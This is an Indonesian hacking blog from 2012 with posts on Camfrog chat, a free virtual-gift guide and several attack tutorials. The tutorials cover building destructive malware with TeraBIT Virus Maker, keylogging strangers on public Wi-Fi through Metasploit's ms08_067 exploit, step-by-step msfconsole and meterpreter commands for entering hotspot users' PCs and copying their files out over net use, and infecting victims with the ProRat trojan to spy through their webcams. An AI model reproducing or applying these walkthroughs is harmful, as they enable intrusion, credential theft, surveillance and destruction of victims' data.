Anda BUgil kami Flood

Diposting oleh suckcamfrog on Senin, 14 Mei 2012

Mungkin tulisan ini terkesan macam-macam, sebenarnya tulisan ini hanya sekedar mengajak anda para Camfroger Indonesia untuk bermain SEHAT dan BERSIH dalam bercamfrog ria... Bangsa ini sudah bobrok kawan, jangan anda tambah dengan kelakuan bejad anda dengan memamerkan Organ Vital anda yg belum tentu indah.. (wkwkwkwkwkkkk... opsss sorry)...

Ya.. mungkin anda akan berpendapat itu hak masing-masing Individu, (kalau mau bugil ya silakan bugil).. Tapi ini juga hak kami (saya) untuk melakukan tindakan pada anda atau room anda yg masih saja melakukan perbuatan kotor, yang masih menyuruh orang-orang untuk bugil di depan cam..

More aboutAnda BUgil kami Flood

Virtual Gift 30 Point Gratis Dari Camfrog (2012)

Diposting oleh suckcamfrog

Tentunya anda-anda pengguna camfrog maniac mau dong VG alias Virtual Gift gratis, ya walaupun hanya 30 point tapi lumayan untuk menambah keren ID anda... oke lansung saja...berikut caranya:
  • buka halaman https://www.camfrog.com/login.php setelah itu silakan masuk dengan ID dan password camfrog yg ingin anda berikan VG.. seperti gambar di bawah ini.
https://www.camfrog.com/login.php

  • Setelah LOG IN klik bagian SETTING (dipojok kanan atas) kemudian anda scroll ke bawah ke bagian EMAIL (ingat email yg anda masukan harus benar sebab notification akan dikirim ke alamat email anda!) dan klik "verification Your email address" liat BAGIAN YG DI LINGKAR MERAH.
  • Pastikan email anda aktif ,kalo email anda sudah tidak aktif ganti email baru aja. Buka email anda dan liat di kolom inbox/Spam/star balasan notification dari pihak camfrog. Lalu KLIK  " verify email address "
  • Setelah anda mengklick verifikasi email akan muncul pemberitahuan seperti gambar di bawah ini.. ini tanda bahwa anda berhasil mendapatkan VG gratis 30 point dari camfrog.

  • Silakan LOGIN ke CAMFROG dengan ID dan PASS anda, lalu perhatikan ID anda telah memakai VG 30 point gratis dari camfrog... (dari pada beli mahal... gratis tak apalah.. wkwkwkkw).


PERHATIAN:

syarat dan kententuan berlaku:
  •   EMAIL yang anda gunakan untuk mendapatkan VG gratis haruslah email yg masih aktif.. kalau lupa atau anda ragu dengan email anda,,. silakan buat email baru. cara ganti email : >klik camfrog>change email>masukan email baru)
  • 1 email hanya berlaku untuk 1 ID dan 1 VG gratis (jd yg punya banyak id tapi emailnya sama,.silahkan ganti emailnya tiap id berbeda).
  • Setiap ID hanya bisa mendapatkan VG 30 Point,  jangan berharap bisa lebih walaupun anda ubah emailnya dengan yg baru. (jngn ngarep bisa konfirmasi satu id sampe 10 kali.
Sekian.... dan yuk......... bercamfrog dengan cerdas jangan hanya coli dan coli terus... wkakkakaka... STOP bugil di depan camera... anda bugil kami flood... siap2.!!!
More aboutVirtual Gift 30 Point Gratis Dari Camfrog (2012)

Panduan Membuat Virus Menggunakan TeraBIT

Diposting oleh suckcamfrog on Selasa, 08 Mei 2012

Terabit Virus Maker 3.2

1. Informasi Software:
  • Software ini dibuat oleh orang Iran. berita tersebut juga belum pasti kebenarannya, tetapi saya mencoba search di google.com dan saya mendapat info yang menyebutkan bahwa software TeraBit Virus Maker adalah asli buatan Iran, dan itu pun dalam versi 3.1 . Dalam versi 3.1 sampai yang sebelumnya, software ini belum support untuk Windows 7, hanya support pada Sistem Operasi sebelum Windows 7, seperti: Windows XP,Vista. Disini saya memiliki Software TeraBit Virus Maker versi 3.2 yang telah support dengan Windows 7.
2. Fungsi Software:
  • Software ini berfungsi untuk membuat virus secara instan dengan kemampuan yang bisa kita pilih sendiri sehingga user dapat menggunakannya dengan mudah dan cepat. Di dalam software tersebut telah disediakan fitur-fitur yang bisa kita gunakan dalam pembuatan virus, ada 54 fitur yang bisa kita gunakan, saya hanya akan menyebutkan 15 fitur saja dan untuk fitur yang lain bisa dilihat di gambar. 15 fitur itu adalah:

1. Avoid Opening Calculator
2. Avoid Opening Copy,Move Window
3. Avoid Opening Gpedit
4. Avoid Opening Media Player
5. Avoid Opening Mozzila Firefox
6. Avoid Opening MsConfig
7. Avoid Opening Notepad
8. Avoid Opening Wordpad
9. Avoid Opening Yahoo Messenger
10. Add 30 User Accounts to Windows
11. Always Clean Clipboard
12. Always Log Off
13. Close Internet Explorer Every 10 sec
14. Delete All Files In Desktop
15. Delete All Files In My Documents

File virus ini ber-ekstensi *.exe . Jadi, ketika file virus ini dieksekusi, maka fitur-fitur yang telah ditambahkan, akan berjalan dan mengubah pengaturan system computer anda sesuai dengan fitur yang anda pilih.
Dan ada item-item yang bisa digunakan untuk melengkapi kesempurnaan dari virus yang anda buat, seperti:
  • Binder berfungsi untuk mengeksekusi/menjalankan file yang kita kaitkan dengan virus yang anda buat, file yang bisa dikaitkan bisa dalam format apa saja, sperti file gambar, file word, exel, powerpoint, music, notepad, dan lain-lain.
  • Fake Error Message berfungsi untuk memunculkan pesan palsu yang kita buat sendiri, dan sub-itemnya ada title, message, dan type. Title isi judul pesan, Message isi dengan pesan kalian sendiri, dan type, pilih tipe yang anda inginkan.
  • Run Custom Command (ini belum saya coba sebelumnya)
  • Add [ ] fake KB(s) to virus berfungsi untuk menambahkan kapasitas palsu ke dalam file virus tersebut.
  • File name after install adalah file yang sebenarnya berjalan, saat file palsu tersebut dieksekusi, disana terdapat tipe/ekstensi *.exe yang bisa digunakan.
  • File Icon adalah item yang digunakan untuk memilih icon file virus tersebut.
  • File Name adalah item yang digunakan untuk memberi nama pada file tersebut.
  • Run Virus with Windows adalah item yang berfungsi untuk menjalankan file pada windows.
  • [R] adalah tombol reset, untuk mereset ulang pengaturan yang telah dipilih ke pengaturan defaultnya
  • Create Virus berfungsi untuk membuat file virus yang telah kita rancang sebelumnya.
3. Cara Menggunakan Software:
  1. Install deepfreeze untuk menjaga agar komputer anda aman.
  2. Disable Antivirus anda, karena software ini dianggap sebagai virus oleh antivirus.
  3. Jalankan Software tVirusMaker.exe
  4. Pilih/ceklist fitur-fitur yang telah disediakan dan pilih item-item yang akan digunakan.
  5. Terakhir anda klik Create Virus dan simpan ke direktori anda.
  6. File virus siap dijalankan. (*dan bagi-bagi ke teman-teman anda, ‘hahahah…hanya saran’*)
4. Download Software :
Download Link —> DOWNLOAD DISINI


Virus-virus ini juga sangat mudah terdeteksi oleh antivirus, kebanyakan akan berhasil apabila target korban tidak menggunakan antivirus / antivirusnya disable. Silakan dicoba dan berekspresi..... silakan coba dikomputer anda sendiri......... :)
More aboutPanduan Membuat Virus Menggunakan TeraBIT

Keylogger Dengan Metasploit

Diposting oleh suckcamfrog on Sabtu, 05 Mei 2012

Iseng-iseng again.. mengapa judulnya kayak gini (Merekam ketukan keyboard target tanpa menyentuh komputernya – keylogger canggih), iyah betul judulnya sesuai kok sama kenyataannya,,yang biasanya ente kalo mau ngerjain temen buat ngerekam keyboard target pake keyloger dengan harapan si korban masukin email dan lain sebagainya.. Ente mondar mandir berkali kali kekomputer target buat naro keylogger dengan berbagai macam alesan,,entah numpang mindahin file or apalah buat naro sebuah keylogger aja,,alesan yang pertama bos minjem laptop luh bos buat mindahin data-data, abis itu seminggu kemudian balik lagi pake alesan bos data-data w kemaren ketinggalan dilaptop luh. Gw minjem lagi dong dengan harapan password email or facebook temennya udah kecantol di jebakan keylogger miliknya,,tapi tutorial kali ini, gak perlu repot2 kok, gak perlu mondar mandir dua kali..Tutorial kali ini kita exploit rekaman keyboard tanpa menyentuh laptop korbannya…dengan modal kita tau ipaddress korban aja udah beres,,Linux gituh Lhhhooooooo…
OK deh langsung aja, tanpa basa basi..
Peralatannya adalah :

  1. Angry IP Scanner (Buat scanning ipaddress)
  2. Nmap (Buat nyecan Port2 yg kebuka n nyecen OS korban sekalian)
  3. Metasploit (Sangat penting buat exploitnya)
1. Pertama buka angryipscanner, pilih netmasknya yg 24 ajee,,pokoknya disesuain aja sama lokasinya dimana,,hahhaha,,kalo sekedar hostpot area area doang yg model model kayak di mol mol mah 24 ajeee…lalu liat ipaddress kita dilaptop kita..dan lakukan scanning dari 0 s/d 255, maka akan muncul gambar kayak gini :
nah gambar diatas itu yg warna biru berati komputernya lagi idup alias lagi nyala.

2. Buka nmap dan lakukan scanning port dan OS korban dengan perintah sudo nmap -O ipkorban, seperti gambar berikut:
liat deh ituhh,,ternyata doi pake windows XP,,hehhehe,,hajar bleeeehhhhhh….sampe keakar2nya bikin intall ulang dalem hitungan detik…Ouuppppsss jangan dungggsss, kan ini tutorialnya tentang ngerekam keyboard buat dapetin password,,hhehheh,,,Oiya yaaaa…lanjuttt blleeehhh..

3. Mulailah exploit, buka applikasinya msfgui,,tekan keyboard Alt+F2 dan ketik “msfgui” setelah kebuka dan Start, pilih “ms08_067_netapi” di Exploit>windows>smb> , seperti gambar berikut ini:

4. Maka akan keluar jendela pilihan OS targetnya, pilihlah “Automatic Targeting”, seperti gambar berikut ini:

5. Lalu scrool kebawah dan pilih “Meterpreter>bind_tcp” , seperti gambar berikut ini:

6. Lalu scrool kebawah lagi dan masukan ipaddress target di kolom “RHOST” , seperti gambar berikut ini:
Lalu scrool ke paling bawah ada tombol, Exploit, tekan aja ituh,,,

7. Maka akan keluar jendela seperti ini di tab “Session”, seperti gambar dibawah ini:

8. Lalu klik kanan itu dan pilih Monitor>Start KeyLogger, seperti gambar dibawah ini:

9. Maka akan keluar path tempat penyimpanan log nya berupa format “txt” dikomputer kita, seperti gambar berikut ini:
coba perhatikan yg Keystrokes being saved to bla bla bla,,itu adalah nama path lokasi penyimpanan lognya dikomputer pinguin kita. dan liat bacaan Recording,,itu berati ketukan keyboard korban sudah mulai di rekam oleh metasploit kita..hhehehe..Saatnya kita tungguin ajaaa dah,,setelah lama, kita tunggu, n udah gak sabar, setelah beberapa menit kita buka ajjeee tuh filenya, seperti gambar berikut ini:

10. Udah gak sabar nih, langsung aja buka,,lalu lakukan searching dengan menekan tombol Ctrl+F dengan memasukkan kata2 kunci yg biasanya bau bau enak, seperti yahoo.com, yahoo.co.id, gmail.com , ymail.com, com, dll, maka akan keluar Insya Allah kayak gini broo:

Kayaknya kena tuh,,,hehhehehe,,,biasanya kalo korban ngetik di keyboard Ctrl maka di file lognya <Ctrl>, kalo dia mencet Enter <Return>, kalo mencet tab <Tab> dan lain sebagainya…
More aboutKeylogger Dengan Metasploit

hack dengan Metasploit !

Diposting oleh suckcamfrog

METAPLOIT Framework ver. 2.6. Aplikasi ini berfungsi untuk mengexploitasi kelemahan suatu system ataupun aplikasi. Aplikasi ini bisa untuk penetration testing ke System Windows, Unix/Linux, dan MacOs, tapi yang lebih cenderung Exploitable adalah Windows SP1. Untuk lebih lengkapnya dapat di baca di website resminya www.metasploit.com.
Ketika saya menulis artikel ini, metasploit sudah merilis yang versi 3.5, tapi saya menggunakan versi 2.6, karna pada dasarnya sama saja, hanya saja versi 3.5 lebih banyak exploitnya :D . Oh iya, dalam Metasploit Framework, kita sudah disediakan banyak exploit, sehingga tidak perlu mendownload lagi. Fungsi exploit yaitu mengirim bufferOverflow pada system korban, sehingga kita dapat menTakeOver shellnya.
Langsung saja, berikut installasinya di Windows.
1. Download dulu di webiste resminya www.metasploit.com, jika tak ada ver. 2.6, coba cari aja di Google, :D usaha sedikit gan.
2.  Kemudian install, dan jalankan msfweb.

Maka akan muncul window shell seperti berikut.

3. Buka Web Browser bisa Internet Explorer, Mozilla, OperaMini, dll. Dan pergi ke http://127.0.0.1:55555, maka tampilannya seperti berikut.
Mungkin tampilan web gui anda akan sedikit berbeda, karena templatenya disini telah saya ganti. :D
4. Kemudian cari corban yang akan kita exploitasi. Bisa menggunakan NMAP, terus kita lakukan port scanning. Disini kita akan mencoba pada system OS Windows Server 2003 yg masih fresh install (belum di Patch). Pada port scanning, pastikan port untuk MSRPC tebuka (default = open). Download NMAP di www.nmap.org
5.Memilih Exploit.
Pada Metasploit Web Interface, di bagian FILTER MODULES pilih “app :: dcom”, setelah itu pilih exploit Microsoft RPC DCOM MSO3-026.
Pilih target pada pilihan Select Target
6. Memilih Payload
Pilih salah satu payload diatas, jika masih bingung, pilih saja win32_bind, yang akan mengexploitasi dan langsung masuk ke command shell target. Berikut beberapa fungsi2 payload :
win32_adduser : menambah user pada system korban
win32_bind : masuk ke shell korban
win32_bind_dllinject : untuk upload / inject dll files
win32_bind_meterpreter : exploitasi dengan menjalankan meterpreter (i like it :) ).
win32_bind_vncinject : inject vncserver pada system korba (untuk kita remote melalui vncviewer).
win32_downloadexec : mendownload dan mengeksekusi aplikasi pada pc korban
win32_exec : mengeksekusi command di system korban.
Sedangkan BIND, PASSIVE, REVERSE, pada dasarnya sama saja.

RHOST ==>> Ip Address Korban (Remote).
LHOST ==>> Ip Address Kita (Local)
RPORT ==>> Port Korban
LPORT ==>> Local Open Port

Setelah diisi semua, kemudian klik exploit untuk mengHack. Hahaha :D , selamat mencoba.
Source: http://lebaksono<dotz>wordpress<dotz>com/2010/11/16/hacking-dengan-metasploit-exploit/


ARTIKEL KEDUA

Wew… keren ya judulnya… sebenernya tutorial kayak gini udah banyak sih di internet, cuma lagi iseng aja pengen nulis tentang metasploit. :*Pasti kalian semua udah pada kenal apa itu metasploit, kalo pengen lebih jelasnya baca aja di websitenya metasploit.
Tapi mungkin tutorial yang saya tulis ini baru pertama, soalnya OS yang saya pake lain dari yang lain. hehe.. Biasanya OS yang dipake buat aksi exploitasi adalah Backtrack, yang memang sudah teruji kehandalannya untuk Pentest (Penetration Testing). Pengen tau OS yang saya pake… ? hehe.. :p
Nah, sekedar share aja ya… OS yang saya pake adalah TealinuxOS 2.0 yang sudah dimodifikasi untuk keperluan pentest. :D Karena TealinuxOS merupakan turunan ubuntu maka, tutorial ini juga berlaku untuk semua distro turunan Ubuntu.
Sebelum belajar metasploit yang perlu disiapkan adalah :
  • Cemilan, buat ngilangin stress kalo exploitasinya gagal mulu… hehe :p
  • OS, terserah, yang penting Linux :D
  • Metasploit Framework, bisa donlod langsung di websitenya metasploit. trus langsung di install ya …
  • fping, install langsung aja, caranya “sudo apt-get install fping”
  • nmap, install langsung juga, caranya “sudo apt-get install nmap”
  • dan yang terakhir jangan lupa siapkan KORBANnya..wkwkwk…
langkah-langkahnya ikuti aja video yang udah saya buat ini,
Tutorialnya bisa di download DISINI
Source: http://www<dotz>mazumam<dotz>web<dotz>id/2010/07/hack-windows-dengan-metasploit-di_21.html

ARTIKEL KETIGA

Rasa penasaran saya muncul ketika banyak forum security membicarakan tentang Metasploit.
Apakah itu metasploit ? Sulitkah menggunakannnya ?
Untuk memberikan gambaran dan mempermudah penjelasan, saya akan memberikan contoh bug pada service DCOM Windows yang dulu sangat populer diexploitasi dengan script exploit : KAHT .
Berikut alat-alat praktek yang kita butuhkan pada percobaan kali ini :
1. Sebuah PC yang cukup bertenaga untuk virtualisasi PC
2. Metasploit Framework, dapat di download disini
3. Microsoft Windows NT SP3-6a/2000/XP/2003 yang memiliki bug pada service DCOM.
4. Vmware, dapat di download disini
Vmware disini digunakan untuk membuat virtualisasi jaringan komputer, sehingga memudahkan anda yang hanya memiliki 1 PC saja dirumah.
Saya akan melompati langkah-langkah menginstall VMware dan juga cara menginstall Windows di VMware, sebab apabila anda tidak mengerti hal tersebut, kemungkinan besar anda juga tidak akan paham yang kita bahas disini.
Sebagai permulaan kita akan memulai dengan mengenal lebih dekat Metasploit Framework. Pada situs pembuatnya dipaparkan secara gamblang tentang apa itu Metasploit framework, dan juga tujuan penggunaannya :
What is it?
The Metasploit Framework is a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
What does it do?
The framework consists of tools, libraries, modules, and user interfaces. The basic function of the framework is a module launcher, allowing the user to configure an exploit module and launch it at a target system. If the exploit succeeds, the payload is executed on the target and the user is provided with a shell to interact with the payload.
Semuanya saya biarkan tertulis dalam bahasa orang bule sebab ada kata-kata yang tidak pas atau tidak bisa dipadankan bila diterjemahkan dalam Bahasa Indonesia.
Selanjutnya untuk lebih jauh tentang exploit maupun bug pada DCOM service dapat anda search sendiri di google, sebab terlalu panjang jika saya jelaskan disini.
Sekarang mari kita ngoprek komputer !
Langkah pertama adalah download Vmware dari situsnya, lalu anda dapat mulai menginstall Windows yang memiliki bug DCOM, kemudian jalankan windows anda di VMware !
Langkah kedua adalah download Metasploit Framework dari situsnya. Lalu install dikomputer anda dan jalankan, hingga keluar tampilan seperti berikut :

Kemudian pada kotak search ketikan dcom, lalu klik Find, dan pilihlah Exploits Microsoft RPC DCOM Interface Overflow.

Setelah itu kita memilih target yang akan kita exploitasi, dalam kasus kali ini Sistem Operasi target kita adalah Windows XP home, oleh karena itu pilihlah yang sesuai, lalu klik Forward :

Kemudian kita dihadapkan pada pilihan payload. Payload adalah sebuah aksi yang dilakukan setelah bug berhasil di exploitasi oleh Metasploit. Untuk pembelajaran, kita pilih Generic/Shell_Bind_TCP , artinya kita akan mengambil alih Shell Bind atau lebih dikenal di lingkungan windows dengan Command Prompt dari target hacking kita. Setelah itu klik Forward.

Langkah berikutnya kita harus menentukan Target Address kita, disini saya telah mengkonfigurasi Windows XP Home di Vmware dengan IP 192.168.126.132, oleh karena itu tuliskan ip tersebut pada kolom RHOST. Sedangkan RPORT disini sudah ditentukan yaitu port 135 yang merupakan port default dari service DCOM dimana secara default dibuka oleh Windows XP Home ! Wah, berbahaya sekali yah… Untuk LPORT disini juga sudah ditentukan yaitu 4444, Local Port akan membuka sebuah port di PC anda untuk berhubungan dengan komputer target. Selanjutnya klik Forward .

Jika target berhasil terexploitasi, anda akan mendapatkan sebuah session yang berisi target hacking kita dan siap untuk di double klik.

Kemudian anda akan mendapati sebuah layar Command Prompt dari komputer target dan anda sebagai Administrator. Jika sudah begini semua terserah anda, jangan tanyakan apa yang bisa dilakukan selanjutnya.Dan selesailah tutorial hacking kali ini Mudah bukan ?
Source: http://www<dotz>agungsetiawan<dotz>web<dotz>id

ARTIKEL KEEMPAT

Kali ini saya akan berikan cara menerobos komputer orang
di area wifi seperti hotel, kampus atau restoran
dalam hal ini tentu saja saya pake OS Linux hehehe
Tentu kita ingin tahu data apa yang ada di dalam
setelah download metasploit for linux di http://www.metasploit.com/download/
Install dengan perintah
$su
# ./namafile.run
pilih yes
tidak perlu diupdate
Ok silahkan jalan-jalan di area hotspot di kampus, mall atau cafe/restoran
jangan lupa duduk yang manis dan tenang sambil minum juice (kopi kurang baik)
Cari target komputer yang sedang aktif online
terlebih dulu cari tau nomor IP DHCP yang kita dapat.
$ sudo ifconfig -a
lihat hasilnya :
eth1 Link encap:Ethernet HWaddr 00:50:BF:1B:B5:51
inet addr:192.168.0.10 Bcast:192.168.0.255 Mask:255.255.255
itu menunjukkan kita mendapat IP 192.168.0.10
langsung scan komputer yang lagi online di area tersebut
$ nmap -sP 192.168.0.0/24
lihat hasilnya :
Host 192.168.0.1 appears to be up.
MAC Address: 00:B0:6C:EF:47:30 (Unknown)
Host arman (192.168.0.10) appears to be up.
Host 192.168.0.1 appears to be up.
MAC Address: 00:E0:4C:ED:41:20 (Unknown)
Host mycomp (192.168.0.11) appears to be up.
MAC Address: 00:E0:5C:FD:45:17 (Unknown)
dan seterusnya……………
OK pilih salah satu target (korban) yaitu : 192.168.0.11
Lakukan ping dulu ke IP korban. sapa tau sudah dipasang firewall
$ ping 192.168.0.11
Jika hasilnya reply maka siap melakukan langkah berikutnya
Scan port yang terbuka terlebih dahulu
$ nmap 192.168.0.11
lihat hasilnya:
PORT STATE SERVICE
139/tcp open nb-session
445/tcp open microsoft-ds
8080/tcp open http-proxy
OK port 445 terbuka dan sasaran empuk untuk menyusup kesana
lakukan urutan exploitasi berikut:
Jalankan metasploit
$ msfconsole
Pilih jenis tools untuk exploit
msf> use windows/smb/ms08_067_netapi
Pilih metode penyerangan
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
Tambahkan target IP korban
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.11
Langsung lakukan exploit
msf exploit(ms08_067_netapi) > exploit
jika muncul prompt dibawah ini brarti serangan berhasil
meterpreter>
Eiits tunggu dulu ini belum menguasai komputer korban sepenuhnya
Tinggal satu perintah lagi, setelah itu baru bisa diapa-apain.
meterpreter> execute -M -f cmd.exe -i
lihat hasilnya :
C:\Windows\System32>
nah kita sudah masuk sepenuhnya… mau diapain nih?
jangan dirusak lah kasihan.. kita copy saja datanya ke komputer kita
barangkali ada surat rahasia atau data korupsi hehehe..
OK persiapan untuk copy data
Pastikan Linux kita sudah ada samba dan service sudah started
Sharinglah sebuah folder di linux kita dengan permission read and write
jangan lupa juga : $ sudo chmod 777 nama-folder
disini saya kasih contoh nama folder saya “didit”
OK Kembali ke komputer korban (target)
cari dulu data yang dianggap penting..
biasanya ditaruh di D:\ atau di My Documents
misalnya data yang kita incar ada di D:\ maka lakukan perintah berikut :
C:\Windows\System32>D:
D:\>dir
05/25/2010 10:57 PM 22.700 rahasia.doc
Nah tuh ada file bernama “rahasia.doc”
selanjutnya kita buat mapping drive ke komputer kita
D:\>net use Z: \\192.168.0.10\didit
OK tinggal copy file “rahasia.doc” ke drive Z: yang sebenarnya adalah komputer kita
D:\>copy rahasia.doc Z:
segera tutup drive Z: agar ga ketahuan oleh korban
D:\>net use /delete Z:
OK aman
Silahkan buka file “rahasia.doc” di folder “didit” menggunakan openoffice
Gampang kan..
Nah seperti etika hacking yang ada pada umumnya
kita bukan hanya memberi cara menerobos tapi juga cara mengamankannya
Yang pertama pakailah Linux hehehe
Jika terpaksa pakai windows maka:
download worm cleaner di http://www.softpedia.com/progDownload/Windows-Worms-Doors-Cleaner-Download-107294.html
lalu buka file tersebut maka otomatis akan menutup port 445
jika ingin membuka lagi port tersebut cukup klik tombol enabled
Jangan lupa aktifkan firewall anda.
Sekian dan terima kasih…
Source: http://saifulanas<dotz>wordpress<dotz>com/2010/05/26/hacking-pake-metasploit/

ARTIKEL KELIMA

Armitage adalah sebuah Tools Grafis (Windows & Linux) untuk manajemen serangan yang digunakan pada Metasploit yang mampu memvisualisasikan target anda, merekomendasikan eksploitasi, dan memperlihatkan kemampuan canggih melalu sebuah skema. Armitage bertujuan untuk membuat Metasploit dapat digunakan untuk praktisi keamanan yang mengerti hacking. Jika Anda ingin belajar Metasploit dan melihat fitur-fitur canggih yang disiapkan, Armitage bisa jadi solusi anda.
Armitage mengatur kemampuan Metasploit saat proses hacking. Terdapat fitur untuk Discovery, akses, Post-exploitation, dan penetrasi/Manuver.
Untuk penemuan, Armitage mengekspos beberapa fitur-fitur manajemen host Metasploit. Anda dapat mengimpor host dan menjalankan scan pada database sasaran. Armitage juga memvisualisasikan database target sehingga anda akan selalu tahu mana host Anda bekerja dan di mana Anda memiliki session.

Armitage membantu dengan Remote Exploitation – menyediakan fitur untuk secara otomatis merekomendasikan eksploitasi yang akan digunakan dan bahkan menjalankan check aktif sehingga Anda tahu mana eksploitasi yang akan bekerja. Jika pilihan ini gagal, Anda dapat menggunakan pendekatan Hail Mary approach dan melepaskan db_autopwn terhadap database target Anda.
Armitage memaparkan fitur klien-sisi Metasploit. Anda dapat memulai browser exploits, menghasilkan malicous file, dan membuat executable meterpreter.
Setelah Anda masuk, Armitage menyediakan beberapa tools yang dibangun pasca-eksploitasi dengan kemampuan dari meterpreter agent. Dengan klik menu Anda akan memperoleh keistimewaan berupa, dump hash password untuk local credentials database, Browse file, dan meluncurkan Command Shell.

Yang terkahir, Armitage membantu proses pengaturan pivoting, yaitu sebuah kemampuan yang memungkinkan Anda menggunakan compromised host sebagai platform untuk menyerang host lain dan menyelidiki lebih lanjut jaringan target dengan kata lain Metasploit bisa meluncurkan serangan dari host yg dikompromikan dan menerima sesi pada host yang sama. Selain itu Armitage juga mengekspos modul SOCKS proxy Metasploit, yang memungkinkan tools eksternal untuk mengambil keuntungan dari pivoting. Dengan tools ini, Anda dapat lebih mengeksplorasi dan melakukan penetrasi maksimal melalui jaringan.
Untuk menggunakan Armitage, Anda memerlukan berikut ini:
* Linux atau Windows
* Java 1.6
* Metasploit Framework 3.5
* Database dikonfigurasi. Pastikan Anda tahu username, password, dan host.

Untuk Mendapatkan Armitage, Silahkan Download disini:

Windows – armitage112510.zip
Linux – armitage112510.tgz
————————————————————————–
Refrensi:
- http://www.fastandeasyhacking.com/manual
- http://www.darknet.org.uk/2010/12/ar…or-metasploit/
- http://www.commonexploits.com/
More abouthack dengan Metasploit !

Hacking Camfrog dengan PRORAT

Diposting oleh suckcamfrog

Kali ini mari kita bermain dengan salah satu tools hacking,yaitu prorat.
Tools buatan orang Turkey ini sangat luar biasa, tools ini berfungsi untuk menyusup ke komputer orang lain. Caranya sangat gampang dan mudah sekali, tinggal kita mengetahui IP dan Port komputer korban, maka kita dapat langsung menginfeksinya.
A. Cara penggunaan ProRat
1. Pertama kali kita harus mengetahui terlebih dahulu IP dan Port korban yang terbuka. Kita dapat melakukannya dengan cara manual atau juga dengan bantuan Ports Scanner.

Dari gambar diatas kita mengetahui semua IP komputer yang aktif dan Port mana saja yang terbuka. Yang akan dijadikan korban pada percobaan kita kali ini adalah komputer dengan IP 192.162.10.233.
2. Langkah selanjutnya yaitu kita jalankan ProRat, tools ini dapat di download di http://www.prorat.net . Sebelumnya matiin dulu Anti Virus kamu (disable), karena ProRat akan terdeteksi sebagai virus. Padahal dia tidak berbahaya bagi komputer kita. Setelah itu isikan IP korban pada form IP dan Portnya (default 5110).

Apabila kita klik tombol Connect maka koneksi ke komputer korban belum bisa, karena komputer korban belum kita infeksi. Untuk menginfeksi komputer korban kita terlebih dahulu membuat server yang akan dijalankan pada komputer korban. Caranya klik tombol Create – Create Prorat Server. Lalu muncul tampilan Notifications :

Centang pilihan Use Proconnective Notifications dan isi IP(DNS)Address dengan IP kita. Pada tab General Setting kita isikan Server Port (default 5110), Server Password dan Victim Name.

Pada tab Bind with File kita dapat menyusupkan file yang akan dijalankan bersama Server. Extensi file bebas.

Selanjutnya adalah tab Server Extension, ada beberapa pilihan extensi server. Kita pilih yang berekstensi .Exe.

Untuk membuat icon server kita klik tab Server Icon, pilih icon apa saja yang kamu inginkan.

Langkah terakhir dari pembuatan server ini adalah klik Create Server.

Setelah berhasil, akan tampil :

3. Kita tinggal menjalankan Server tersebut dikomputer korban. Caranya terserah kamu… mau disusupkan diam-diam atau memakai teknik Social Engineering dan juga dapat kamu infeksikan langsung pada komputer tersebut (kalo bias sihh).
4. Setelah Server tersebut berhasil berjalan pada komputer korban, maka kita langsung mencoba mengkoneksikannya dengan komputer kita.
5. Untuk koneksi kita dapat menggunakan ProConnective atau langsung mengetikkan IP address dan Port komputer korban. ProConnective adalah tools bawaan dari ProRat yang berfungsi sebagai Bridge (jembatan koneksi) antara komputer server dan komputer client (korban). Akan nampak IP korban apabila dia sedang on.

6. Setelah berhasil melakukan koneksi ke komputer korban maka status dari ProRat akan berubah dari Disconnected ke Connected

7. Nah…saatnya kita bermain. Ada banyak hal yang dapat kita lakukan pada komputer korban seperti mengetahui informasi dari PC, mengirimkan pesan error, mematikan komputer, mengunci mouse, membuka CD-ROM atau bahkan memotret wajah korban .
8. Sekarang kita akan melihat PC info korban :

Dari gambar diatas kita dapat melihat informasi yang dimiliki dari komputer korban.
9. Kita juga dapat mengirimkan pesan error palsu ke komputer korban :

10. Memasang Keylogger.

11. Dan yang paling seru adalah melihat wajah dari korban yang kita hack.



Bagaimana seru kan? Itu masih sebagian kecil dari kegunaan ProRat masih banyak lagi fungsi lainnya, seperti memformat hardisk milik korban, mengacaukan registry, mencuri data-data penting dan lain sebagainya. Akan tetapi, dalam pembahasan kita kali ini kita cukupkan sekian saja ya. Ok !
Gunakan dengan baik ya…
B. Cara Pencegahan

1. Update selalu Anti Virus anda agar mampu mendeteksi adanya infeksi dari ProRat. Biasanya server ProRat terdeteksi sebagai Trojan.Dropper.Prorat.DZ.29, Dropped:Backdoor.Prorat.DZ.
2. Pasanglah Anti Prorat, anda bisa mendownloadnya di www.softpedia.com/get/Antivirus/Anti-prorat.shtml.
Selamat mencoba…
More aboutHacking Camfrog dengan PRORAT